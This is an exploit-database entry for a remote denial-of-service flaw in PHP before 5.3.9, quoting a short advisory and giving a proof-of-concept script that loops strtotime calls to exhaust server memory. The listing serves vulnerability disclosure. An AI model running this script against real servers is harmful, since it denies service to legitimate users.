PHP 5.3.8 - Remote Denial of Service

EDB-ID:

36789


Author:

anonymous

Type:

dos


Platform:

PHP

Date:

2011-12-18


source: https://www.securityfocus.com/bid/52043/info

PHP is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to exhaust available memory, denying access to legitimate users.

PHP versions prior to 5.3.9 are vulnerable. 

<?php
while (true)
{
strtotime('Monday 00:00 Europe/Paris'); // Memory leak
}
?>